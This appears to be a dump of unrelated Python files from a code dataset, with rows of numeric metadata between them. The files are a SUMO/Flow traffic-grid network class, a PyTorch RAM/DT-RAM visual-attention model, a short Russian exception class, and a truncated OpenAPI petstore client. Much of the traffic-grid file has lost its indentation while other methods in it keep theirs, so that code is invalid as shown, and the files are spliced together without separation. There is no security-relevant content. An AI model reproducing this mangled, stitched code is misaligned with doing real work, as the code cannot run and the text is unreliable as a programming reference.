# refer to the ADDITIONAL_NET_PARAMS dict for more documentation
self.vertical_lanes = net_params.additional_params["vertical_lanes"]
self.horizontal_lanes = net_params.additional_params[
"horizontal_lanes"]
self.speed_limit = net_params.additional_params["speed_limit"]
if not isinstance(self.speed_limit, dict):
self.speed_limit = {
"horizontal": self.speed_limit,
"vertical": self.speed_limit
}
self.grid_array = net_params.additional_params["grid_array"]
self.row_num = self.grid_array["row_num"]
self.col_num = self.grid_array["col_num"]
self.row_idx_num = self.grid_array["row_idx"]
self.col_idx_num = self.grid_array["col_idx"]
self.inner_length = self.grid_array["inner_length"]
self.outer_length = self.grid_array.get("outer_length", None)
assert self.outer_length == self.inner_length // 2
self.sub_edge_num = self.grid_array.get("sub_edge_num", 1)
# specifies whether or not there will be traffic lights at the
# intersections (False by default)
self.use_traffic_lights = net_params.additional_params.get(
"traffic_lights", False)
# radius of the inner nodes (ie of the intersections)
# self.inner_nodes_radius = 2.9 + 3.3 * max(self.vertical_lanes,
# self.horizontal_lanes)
self.inner_nodes_radius = 0
# total number of edges in the network
self.num_edges = self.col_idx_num * self.row_idx_num * (2 * self.col_num * self.row_num + self.col_num + self.row_num)
# name of the network (DO NOT CHANGE)
self.name = "BobLoblawsLawBlog"
super().__init__(name, vehicles, net_params, persons, initial_config,
traffic_lights)
def specify_nodes(self, net_params):
"""Build out the inner nodes of the network.
The inner nodes correspond to the intersections between the roads. They
are numbered from bottom left, increasing first across the columns and
then across the rows.
For example, the nodes in a traffic light grid with 2 rows and 3 columns
would be indexed as follows:
| | |
--- 3 --- 4 --- 5 ---
| | |
--- 0 --- 1 --- 2 ---
| | |
The id of a node is then "center{index}", for instance "center0" for
node 0, "center1" for node 1 etc.
Returns
-------
list <dict>
List of inner nodes
"""
node_type = "traffic_light" if self.use_traffic_lights else "priority"
nodes = []
for row in range(self.row_num):
for col in range(self.col_num):
for row_idx in range(self.row_idx_num):
for col_idx in range(self.col_idx_num):
nodes.append({
"id": "center{}_{}".format(row * self.col_num + col, row_idx * self.col_idx_num + col_idx),
"x": col * self.inner_length + col_idx * self.col_num * self.inner_length,
"y": row * self.inner_length + row_idx * self.row_num * self.inner_length,
"type": node_type,
# "radius": self.inner_nodes_radius
})
inserted_nodes = []
for col in range(self.col_num * self.col_idx_num):
for row_idx in range(self.row_idx_num + 1):
inserted_nodes.append({
"id": "row_{}_{}_left".format(col, row_idx),
"x": col * self.inner_length,
"y": row_idx * self.row_num * self.inner_length - self.outer_length,
"type": "priority",
})
inserted_nodes.append({
"id": "row_{}_{}_right".format(col, row_idx),
"x": col * self.inner_length,
"y": row_idx * self.row_num * self.inner_length - self.outer_length,
"type": "priority",
})
for row in range(self.row_num * self.row_idx_num):
for col_idx in range(self.col_idx_num + 1):
inserted_nodes.append({
"id": "col_{}_{}_bot".format(row, col_idx),
"x": col_idx * self.col_num * self.inner_length - self.outer_length,
"y": row * self.inner_length,
"type": "priority",
})
inserted_nodes.append({
"id": "col_{}_{}_top".format(row, col_idx),
"x": col_idx * self.col_num * self.inner_length - self.outer_length,
"y": row * self.inner_length,
"type": "priority",
})
return nodes + inserted_nodes
    def specify_edges(self, net_params):
        """Build out the inner edges of the network.
        The inner edges are the edges joining the inner nodes to each other.
        Consider the following network with n = 2 rows and m = 3 columns,
        where the rows are indexed from 0 to 1 and the columns from 0 to 2, and
        the inner nodes are marked by 'x':
                 |     |     |
        (1) ----x-----x-----x----
                 |     |     |
        (0) ----x-----x-(*)-x----
                 |     |     |
               (0)   (1)   (2)
        There are n * (m - 1) = 4 horizontal inner edges and (n - 1) * m = 3
        vertical inner edges, all that multiplied by two because each edge
        consists of two roads going in opposite directions traffic-wise.
        On an horizontal edge, the id of the top road is "top{i}_{j}" and the
        id of the bottom road is "bot{i}_{j}", where i is the index of the row
        where the edge is and j is the index of the column to the right of it.
        On a vertical edge, the id of the right road is "right{i}_{j}" and the
        id of the left road is "left{i}_{j}", where i is the index of the row
        above the edge and j is the index of the column where the edge is.
        For example, on edge (*) on row (0): the id of the bottom road (traffic
        going from left to right) is "bot0_2" and the id of the top road
        (traffic going from right to left) is "top0_2".
        In addition to the inner edges, this method also builds the flow edges
        ("in_*"/"out_*") that connect the boundary nodes created by
        ``specify_nodes`` to the outermost intersections of each sub-grid area.
        Returns
        -------
        list <dict>
            List of inner edges
        """
        edges = []
        # Helper: build the single directed road "{lane}{index}_{area_index}"
        # from "center{from_node}_{area_index}" to "center{to_node}_{area_index}".
        # Returned as a one-element list so callers can accumulate with ``+=``.
        def new_edge(index, from_node, to_node, orientation, lane, area_index):
            assert from_node != to_node
            node_list = ["center{}_{}".format(from_node, area_index)] + ["center{}_{}".format(to_node, area_index)]
            new_edges = []
            new_edges.append({
                "id": "{}{}_{}".format(lane, index, area_index),
                "type": orientation,
                # NOTE(review): 78 is a magic right-of-way value shared by all
                # edges in this method -- presumably a SUMO priority; confirm
                # against the SUMO network format documentation.
                "priority": 78,
                "from": node_list[0],
                "to": node_list[1],
                "length": self.inner_length
            })
            return new_edges
        # Build the horizontal inner edges (one top/bot pair per cell border,
        # replicated once per sub-grid area).
        for i in range(self.row_num):
            for j in range(self.col_num - 1):
                for row_idx in range(self.row_idx_num):
                    for col_idx in range(self.col_idx_num):
                        # flattened sub-grid area index, matching specify_nodes
                        area_idx = row_idx * self.col_idx_num + col_idx
                        node_index = i * self.col_num + j
                        index = "{}_{}".format(i, j + 1)
                        edges += new_edge(index, node_index + 1, node_index,
                                          "horizontal", "top", area_idx)
                        edges += new_edge(index, node_index, node_index + 1,
                                          "horizontal", "bot", area_idx)
        # Build the vertical inner edges (one right/left pair per cell border).
        for i in range(self.row_num - 1):
            for j in range(self.col_num):
                for row_idx in range(self.row_idx_num):
                    for col_idx in range(self.col_idx_num):
                        area_idx = row_idx * self.col_idx_num + col_idx
                        node_index = i * self.col_num + j
                        index = "{}_{}".format(i + 1, j)
                        edges += new_edge(index, node_index, node_index + self.col_num,
                                          "vertical", "right", area_idx)
                        edges += new_edge(index, node_index + self.col_num, node_index,
                                          "vertical", "left", area_idx)
        # Build vertical and horizontal flow edges: short (outer_length) roads
        # joining the boundary "row_*"/"col_*" nodes to the outermost
        # intersections of each sub-grid area.
        for row_idx in range(self.row_idx_num):
            for col_idx in range(self.col_idx_num):
                for col in range(self.col_num):
                    # column index in the global (all sub-grids) frame
                    col_true = col + col_idx * self.col_num
                    area_idx = row_idx * self.col_idx_num + col_idx
                    # traffic entering through the upper boundary node into
                    # the top-row intersection of this area
                    edges += [{
                        "id": "in_left{}_{}".format(col, area_idx),
                        "type": "vertical",
                        "priority": 78,
                        "from": "row_{}_{}_left".format(col_true, row_idx + 1),
                        "to": "center{}_{}".format((self.row_num - 1) * self.col_num + col, area_idx),
                        "length": self.outer_length
                    }]
                    # traffic leaving the top-row intersection through the
                    # upper boundary node
                    edges += [{
                        "id": "out_right{}_{}".format(col, area_idx),
                        "type": "vertical",
                        "priority": 78,
                        "from": "center{}_{}".format((self.row_num - 1) * self.col_num + col, area_idx),
                        "to": "row_{}_{}_right".format(col_true, row_idx + 1),
                        "length": self.outer_length
                    }]
                    # traffic entering through the lower boundary node into
                    # the bottom-row intersection
                    edges += [{
                        "id": "in_right{}_{}".format(col, area_idx),
                        "type": "vertical",
                        "priority": 78,
                        "from": "row_{}_{}_right".format(col_true, row_idx),
                        "to": "center{}_{}".format(col, area_idx),
                        "length": self.outer_length
                    }]
                    # traffic leaving the bottom-row intersection through the
                    # lower boundary node
                    edges += [{
                        "id": "out_left{}_{}".format(col, area_idx),
                        "type": "vertical",
                        "priority": 78,
                        "from": "center{}_{}".format(col, area_idx),
                        "to": "row_{}_{}_left".format(col_true, row_idx),
                        "length": self.outer_length
                    }]
                for row in range(self.row_num):
                    # row index in the global (all sub-grids) frame
                    row_true = row + row_idx * self.row_num
                    area_idx = row_idx * self.col_idx_num + col_idx
                    # traffic entering through the right boundary node into
                    # the rightmost intersection of this row
                    edges += [{
                        "id": "in_top{}_{}".format(row, area_idx),
                        "type": "horizontal",
                        "priority": 78,
                        "from": "col_{}_{}_top".format(row_true, col_idx + 1),
                        "to": "center{}_{}".format(row * self.col_num + self.col_num - 1, area_idx),
                        "length": self.outer_length
                    }]
                    # traffic leaving the rightmost intersection through the
                    # right boundary node
                    edges += [{
                        "id": "out_bot{}_{}".format(row, area_idx),
                        "type": "horizontal",
                        "priority": 78,
                        "from": "center{}_{}".format(row * self.col_num + self.col_num - 1, area_idx),
                        "to": "col_{}_{}_bot".format(row_true, col_idx + 1),
                        "length": self.outer_length
                    }]
                    # traffic entering through the left boundary node into
                    # the leftmost intersection of this row
                    edges += [{
                        "id": "in_bot{}_{}".format(row, area_idx),
                        "type": "horizontal",
                        "priority": 78,
                        "from": "col_{}_{}_bot".format(row_true, col_idx),
                        "to": "center{}_{}".format(row * self.col_num, area_idx),
                        "length": self.outer_length
                    }]
                    # traffic leaving the leftmost intersection through the
                    # left boundary node
                    edges += [{
                        "id": "out_top{}_{}".format(row, area_idx),
                        "type": "horizontal",
                        "priority": 78,
                        "from": "center{}_{}".format(row * self.col_num, area_idx),
                        "to": "col_{}_{}_top".format(row_true, col_idx),
                        "length": self.outer_length
                    }]
        return edges
def specify_routes(self, net_params):
"""See parent class."""
routes = {}
edges = self.specify_edges(net_params)
for edge in edges:
routes[edge['id']] = [edge['id']]
return routes
def specify_types(self, net_params):
"""See parent class."""
types = [{
"id": "horizontal",
"numLanes": self.horizontal_lanes,
"speed": self.speed_limit["horizontal"]
}, {
"id": "vertical",
"numLanes": self.vertical_lanes,
"speed": self.speed_limit["vertical"]
}]
return types
# ===============================
# ============ UTILS ============
# ===============================
def specify_connections(self, net_params):
"""Build out connections at each inner node.
"""
con_dict = {}
# specify certain connections for given edge pair
# In form of {"from" : edge id,
# "to" : edge id, \
# "fromLane":(sub-edge of a certain edge and it is by default 0) : {number between 0 to self.lanes - 1},
# "toLane":{number between 0 to self.lanes - 1}}
def new_con(from_id, to_id):
conn = []
for lane1 in range(self.vertical_lanes):
for lane2 in range(self.vertical_lanes):
conn.append({
"from": from_id,
"to": to_id,
"fromLane": str(lane1),
"toLane": str(lane2),
})
return conn
# build connections at each inner node
for area_idx in range(self.col_idx_num * self.row_idx_num):
for node_id in range(self.row_num * self.col_num):
conn = []
i = node_id // self.col_num
j = node_id % self.col_num
if i + 1 < self.row_num:
top_edge_id = ["right{}_{}_{}".format(i + 1, j, area_idx), "left{}_{}_{}".format(i + 1, j, area_idx)]
else:
top_edge_id = ["out_right{}_{}".format(j, area_idx), "in_left{}_{}".format(j, area_idx)]
if i > 0:
bot_edge_id = ["left{}_{}_{}".format(i, j, area_idx), "right{}_{}_{}".format(i, j, area_idx)]
else:
bot_edge_id = ["out_left{}_{}".format(j, area_idx), "in_right{}_{}".format(j, area_idx)]
if j > 0:
left_edge_id = ["top{}_{}_{}".format(i, j, area_idx), "bot{}_{}_{}".format(i, j, area_idx)]
else:
left_edge_id = ["out_top{}_{}".format(i, area_idx), "in_bot{}_{}".format(i, area_idx)]
if j + 1 < self.col_num:
right_edge_id = ["bot{}_{}_{}".format(i, j + 1, area_idx), "top{}_{}_{}".format(i, j + 1, area_idx)]
else:
right_edge_id = ["out_bot{}_{}".format(i, area_idx), "in_top{}_{}".format(i, area_idx)]
assert self.vertical_lanes == self.horizontal_lanes
for i in [top_edge_id, bot_edge_id, left_edge_id, right_edge_id]:
for j in [top_edge_id, bot_edge_id, left_edge_id, right_edge_id]:
conn += new_con(i[1], j[0])
node_name = "center{}_{}".format(node_id, area_idx)
con_dict[node_name] = conn
for row in range(self.row_num * self.row_idx_num):
for col in range(1, self.col_idx_num):
i = row % self.row_num
j = row // self.row_num
conn = []
node_name = "col_{}_{}_top".format(row, col)
conn += new_con("out_top{}_{}".format(i, j * self.col_idx_num + col), "in_top{}_{}".format(i, j * self.col_idx_num + col - 1))
con_dict[node_name] = conn
conn = []
node_name = "col_{}_{}_bot".format(row, col)
conn += new_con("out_bot{}_{}".format(i, j * self.col_idx_num + col - 1), "in_bot{}_{}".format(i, j * self.col_idx_num + col))
con_dict[node_name] = conn
for col in range(self.col_num * self.col_idx_num):
for row in range(1, self.row_idx_num):
i = col % self.col_num
j = col // self.col_num
conn = []
node_name = "row_{}_{}_left".format(col, row)
conn += new_con("out_left{}_{}".format(i, row * self.col_idx_num + j), "in_left{}_{}".format(i, row * self.col_idx_num + j - self.col_idx_num))
con_dict[node_name] = conn
conn = []
node_name = "row_{}_{}_right".format(col, row)
conn += new_con("out_right{}_{}".format(i, row * self.col_idx_num + j - self.col_idx_num), "in_right{}_{}".format(i, row * self.col_idx_num + j))
con_dict[node_name] = conn
return con_dict
# TODO necessary?
def specify_edge_starts(self):
"""See parent class."""
length = 0
edgestarts = []
for edge in self.edges:
# the current edge starts where the last edge ended
edgestarts.append((edge['id'], length))
# increment the total length of the network with the length of the
# current edge
length += float(edge['length'])
return edgestarts
    @property
    def node_mapping(self):
        """Map nodes to edges.

        Returns a list of pairs (node, connected edges) of all inner nodes
        and for each of them, the 4 inner edges that leave this node.

        The nodes are listed in alphabetical order, and within that, edges
        are listed in order: [left, bot, right, top].  An entry is ``None``
        when the node lies on the border of its sub-grid and has no inner
        edge in that direction (only an in_*/out_* flow edge).
        """
        mapping = {}
        for area_idx in range(self.col_idx_num * self.row_idx_num):
            for node_id in range(self.row_num * self.col_num):
                node_name = "center{}_{}".format(node_id, area_idx)
                # (i, j) = (row, column) of the node inside its sub-grid
                i = node_id // self.col_num
                j = node_id % self.col_num
                # ids of the inner roads leaving the node on each side;
                # None when the neighbouring cell does not exist
                top_edge_id = "left{}_{}_{}".format(i + 1, j, area_idx) if i + 1 < self.row_num else None
                bot_edge_id = "right{}_{}_{}".format(i, j, area_idx) if i > 0 else None
                left_edge_id = "bot{}_{}_{}".format(i, j, area_idx) if j > 0 else None
                right_edge_id = "top{}_{}_{}".format(i, j + 1, area_idx) if j + 1 < self.col_num else None
                mapping[node_name] = [left_edge_id, bot_edge_id, right_edge_id, top_edge_id]
        return sorted(mapping.items(), key=lambda x: x[0])
| 45.276434 | 180 | 0.514722 | 8,276 | 65,515 | 3.811382 | 0.037095 | 0.044891 | 0.028215 | 0.024855 | 0.887202 | 0.845671 | 0.811052 | 0.752116 | 0.729258 | 0.702945 | 0 | 0.013109 | 0.364237 | 65,515 | 1,446 | 181 | 45.307746 | 0.74419 | 0.212928 | 0 | 0.643098 | 0 | 0 | 0.104796 | 0 | 0 | 0 | 0 | 0.001383 | 0.008979 | 1 | 0.035915 | false | 0 | 0.005612 | 0.002245 | 0.078563 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a96e35b53453218901d95213757f5e94b4b042b | 7,354 | py | Python | model.py | bennzo/DT-RAM-PyTorch | b364662ab7650ffd26cf129673752521e004b13a | [
"MIT"
] | null | null | null | model.py | bennzo/DT-RAM-PyTorch | b364662ab7650ffd26cf129673752521e004b13a | [
"MIT"
] | null | null | null | model.py | bennzo/DT-RAM-PyTorch | b364662ab7650ffd26cf129673752521e004b13a | [
"MIT"
] | null | null | null | import torch.nn as nn
import modules
class RecurrentAttention(nn.Module):
"""A Recurrent Model of Visual Attention (RAM) [1].
RAM is a recurrent neural network that processes
inputs sequentially, attending to different locations
within the image one at a time, and incrementally
combining information from these fixations to build
up a dynamic internal representation of the image.
References:
[1]: Minh et. al., https://arxiv.org/abs/1406.6247
"""
def __init__(
self, g, k, s, c, h_g, h_l, std, hidden_size, num_classes,
):
"""Constructor.
Args:
g: size of the square patches in the glimpses extracted by the retina.
k: number of patches to extract per glimpse.
s: scaling factor that controls the size of successive patches.
c: number of channels in each image.
h_g: hidden layer size of the fc layer for `phi`.
h_l: hidden layer size of the fc layer for `l`.
std: standard deviation of the Gaussian policy.
hidden_size: hidden size of the rnn.
num_classes: number of classes in the dataset.
num_glimpses: number of glimpses to take per image,
i.e. number of BPTT steps.
"""
super().__init__()
self.std = std
self.sensor = modules.GlimpseNetwork(h_g, h_l, g, k, s, c)
self.rnn = modules.CoreNetwork(hidden_size, hidden_size)
self.locator = modules.LocationNetwork(hidden_size, 2, std)
self.classifier = modules.ActionNetwork(hidden_size, num_classes)
self.baseliner = modules.BaselineNetwork(hidden_size, 1)
def forward(self, x, l_t_prev, h_t_prev, last=False):
"""Run RAM for one timestep on a minibatch of images.
Args:
x: a 4D Tensor of shape (B, H, W, C). The minibatch
of images.
l_t_prev: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the previous
timestep `t-1`.
h_t_prev: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the previous timestep `t-1`.
last: a bool indicating whether this is the last timestep.
If True, the action network returns an output probability
vector over the classes and the baseline `b_t` for the
current timestep `t`. Else, the core network returns the
hidden state vector for the next timestep `t+1` and the
location vector for the next timestep `t+1`.
Returns:
h_t: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the current timestep `t`.
mu: a 2D tensor of shape (B, 2). The mean that parametrizes
the Gaussian policy.
l_t: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the
current timestep `t`.
b_t: a vector of length (B,). The baseline for the
current time step `t`.
log_probas: a 2D tensor of shape (B, num_classes). The
output log probability vector over the classes.
log_pi: a vector of length (B,).
"""
g_t = self.sensor(x, l_t_prev)
h_t = self.rnn(g_t, h_t_prev)
log_pi, l_t = self.locator(h_t)
b_t = self.baseliner(h_t).squeeze()
if last:
log_probas = self.classifier(h_t)
return h_t, l_t, b_t, log_probas, log_pi
return h_t, l_t, b_t, log_pi
class RecurrentAttentionDynamic(nn.Module):
"""A Recurrent Model of Visual Attention (RAM) [1].
Similar implementation to the `RecurrentAttention` class
with the addition of a stopping network in case of a confident
classification. also known as DT-RAM[2].
References:
[1]: Minh et. al., https://arxiv.org/abs/1406.6247
[2]: Li et. al., https://arxiv.org/abs/1703.10332
"""
def __init__(
self, g, k, s, c, h_g, h_l, std, hidden_size, num_classes,
):
"""Constructor.
Args:
g: size of the square patches in the glimpses extracted by the retina.
k: number of patches to extract per glimpse.
s: scaling factor that controls the size of successive patches.
c: number of channels in each image.
h_g: hidden layer size of the fc layer for `phi`.
h_l: hidden layer size of the fc layer for `l`.
std: standard deviation of the Gaussian policy.
hidden_size: hidden size of the rnn.
num_classes: number of classes in the dataset.
num_glimpses: number of glimpses to take per image,
i.e. number of BPTT steps.
"""
super().__init__()
self.std = std
self.sensor = modules.GlimpseNetwork(h_g, h_l, g, k, s, c)
self.rnn = modules.CoreNetwork(hidden_size, hidden_size)
self.locator = modules.LocationNetwork(hidden_size, 2, std)
self.classifier = modules.ActionNetwork(hidden_size, num_classes)
self.baseliner = modules.BaselineNetwork(hidden_size, 1)
self.stopper = modules.StoppingNetwork(hidden_size, 1)
def forward(self, x, l_t_prev, h_t_prev, last=False, use_stop=False):
"""Run RAM for one timestep on a minibatch of images.
Args:
x: a 4D Tensor of shape (B, H, W, C). The minibatch
of images.
l_t_prev: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the previous
timestep `t-1`.
h_t_prev: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the previous timestep `t-1`.
last: a bool indicating whether this is the last timestep.
If True, the action network returns an output probability
vector over the classes and the baseline `b_t` for the
current timestep `t`. Else, the core network returns the
hidden state vector for the next timestep `t+1` and the
location vector for the next timestep `t+1`.
Returns:
h_t: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the current timestep `t`.
mu: a 2D tensor of shape (B, 2). The mean that parametrizes
the Gaussian policy.
l_t: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the
current timestep `t`.
b_t: a vector of length (B,). The baseline for the
current time step `t`.
log_probas: a 2D tensor of shape (B, num_classes). The
output log probability vector over the classes.
log_pi: a vector of length (B,).
"""
g_t = self.sensor(x, l_t_prev)
h_t = self.rnn(g_t, h_t_prev)
log_pi_loc, l_t = self.locator(h_t)
log_pi_stop, a_t = self.stopper(h_t)
log_prob_class = self.classifier(h_t)
b_t = self.baseliner(h_t).squeeze()
return h_t, l_t, b_t, log_prob_class, log_pi_loc, a_t.squeeze(), log_pi_stop.squeeze()
| 42.022857 | 94 | 0.607289 | 1,069 | 7,354 | 4.047708 | 0.173994 | 0.048532 | 0.042061 | 0.045297 | 0.856714 | 0.856714 | 0.845621 | 0.845621 | 0.835221 | 0.823203 | 0 | 0.012736 | 0.316698 | 7,354 | 174 | 95 | 42.264368 | 0.848358 | 0.624422 | 0 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
76f93605276afc5f9ee3da8aaed75e76c52d2b5b | 230 | py | Python | my_package/repo/client_errors.py | OOPSA45/Python-learn- | b38ad51c1c45c46b80e4da3d328cc841388ca21a | [
"Apache-2.0"
] | null | null | null | my_package/repo/client_errors.py | OOPSA45/Python-learn- | b38ad51c1c45c46b80e4da3d328cc841388ca21a | [
"Apache-2.0"
] | null | null | null | my_package/repo/client_errors.py | OOPSA45/Python-learn- | b38ad51c1c45c46b80e4da3d328cc841388ca21a | [
"Apache-2.0"
] | null | null | null | class NoneContactError(Exception):
"""Не найден контакт"""
def __init__(self, username):
self.username = username
def __str__(self):
return 'Контакт с именем {} не найден'.format(self.username) | 28.75 | 68 | 0.643478 | 25 | 230 | 5.6 | 0.6 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243478 | 230 | 8 | 68 | 28.75 | 0.804598 | 0.073913 | 0 | 0 | 0 | 0 | 0.144279 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0a018863df4997ffbadf33ade2e1e4c588ee30ed | 42,426 | py | Python | samples/openapi3/client/petstore/python-experimental/petstore_api/api/pet_api.py | denyo/openapi-generator | 468d80be4beff74de33a2dd1d533f855030038d5 | [
"Apache-2.0"
] | null | null | null | samples/openapi3/client/petstore/python-experimental/petstore_api/api/pet_api.py | denyo/openapi-generator | 468d80be4beff74de33a2dd1d533f855030038d5 | [
"Apache-2.0"
] | null | null | null | samples/openapi3/client/petstore/python-experimental/petstore_api/api/pet_api.py | denyo/openapi-generator | 468d80be4beff74de33a2dd1d533f855030038d5 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from petstore_api.api_client import ApiClient, Endpoint
from petstore_api.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from petstore_api.model import pet
from petstore_api.model import api_response
class PetApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __add_pet(
self,
pet_pet,
**kwargs
):
"""Add a new pet to the store # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_pet(pet_pet, async_req=True)
>>> result = thread.get()
Args:
pet_pet (pet.Pet): Pet object that needs to be added to the store
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_pet'] = \
pet_pet
return self.call_with_http_info(**kwargs)
self.add_pet = Endpoint(
settings={
'response_type': None,
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet',
'operation_id': 'add_pet',
'http_method': 'POST',
'servers': [
{
'url': "http://petstore.swagger.io/v2",
'description': "No description provided",
},
{
'url': "http://path-server-test.petstore.local/v2",
'description': "No description provided",
},
]
},
params_map={
'all': [
'pet_pet',
],
'required': [
'pet_pet',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_pet':
(pet.Pet,),
},
'attribute_map': {
},
'location_map': {
'pet_pet': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client,
callable=__add_pet
)
def __delete_pet(
self,
pet_id,
**kwargs
):
"""Deletes a pet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_pet(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): Pet id to delete
Keyword Args:
api_key (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.delete_pet = Endpoint(
settings={
'response_type': None,
'auth': [
'petstore_auth'
],
'endpoint_path': '/pet/{petId}',
'operation_id': 'delete_pet',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'pet_id',
'api_key',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'api_key':
(str,),
},
'attribute_map': {
'pet_id': 'petId',
'api_key': 'api_key',
},
'location_map': {
'pet_id': 'path',
'api_key': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__delete_pet
)
def __find_pets_by_status(
self,
status,
**kwargs
):
"""Finds Pets by status # noqa: E501
Multiple status values can be provided with comma separated strings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_pets_by_status(status, async_req=True)
>>> result = thread.get()
Args:
status ([str]): Status values that need to be considered for filter
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[pet.Pet]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
